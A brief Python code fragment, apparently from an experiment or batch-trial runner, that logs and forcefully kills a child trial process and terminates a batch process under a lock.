log.info("Forcefully terminating trial (proc %i)", child.pid)
child.kill()
log.info("Stopping batch (pending trials can be started as needed)")
with __trial_running_lock:
this_p.terminate()
|